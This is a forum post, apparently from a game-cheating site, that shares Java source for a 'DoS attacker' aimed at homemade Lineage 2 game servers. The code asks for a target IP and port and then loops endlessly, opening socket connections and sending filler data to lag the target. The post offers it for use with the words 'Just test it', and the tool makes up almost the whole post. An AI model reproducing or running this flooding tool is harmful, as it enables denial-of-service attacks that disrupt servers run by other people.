Jump to content

Recommended Posts

Posted

Just One NewBie java dos attacker... it cant destroy any "l2 server" but if "l2 server" have got homemaded "server" it can litle lag it ;)

package doscript;

import java.util.Scanner;
import java.io.*;
import java.net.*;
public class Main {
   public static void main(String[] args) throws IOException {
        Scanner x = new Scanner(System.in);
        String A;
        int B;
        System.out.println("+-----------------------------------------------+");
        System.out.println("+---       Coolis Java Dos Attacker   ---+");
        System.out.println("+-----            MaxCheaterS.com            ----+");
        System.out.println("+-----------------------------------------------+");
        System.out.print("Enter target IP:");
        A = x.next();
        System.out.print("\nEnter target port:");
        B = x.nextInt();
        while (1==1) {
        Socket sock = new Socket(A, B);
        BufferedReader in = new BufferedReader(new InputStreamReader(sock.getInputStream()));
        PrintWriter out = new PrintWriter(sock.getOutputStream(), true);
        System.out.print("*");
        out.print("AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA​AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA");
        in.close();
     }
}
}

 

Just test it... (if you try to dedicated it will have no effect... Only for home pc...)

  • 2 months later...
  • 3 months later...

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.
Note: Your post will require moderator approval before it will be visible.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...